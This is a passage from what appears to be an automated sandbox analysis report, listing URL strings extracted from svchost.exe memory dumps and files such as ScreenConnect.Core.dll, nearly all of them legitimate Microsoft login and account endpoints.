                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388501755.000001CEA3157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwame
                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: svchost.exe, 00000007.00000003.1383388328.0000025CF7860000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf53457
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502er
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfP
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1498219510.000001CEA36D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfer
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuer
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507247367.000001CEA3159000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DjzYTHDArzjEperSFKoy5hDVylCtJARcPfOWs0i
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600suer
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000008.00000002.2609297562.000001CEA3617000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfssue
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfsuer
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806045
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388501755.000001CEA3157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388303192.000001CEA315A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000008.00000002.2609739077.000001CEA369C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf0
                  Source: svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf256
                  Source: svchost.exe, 00000008.00000002.2608129190.000001CEA28E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
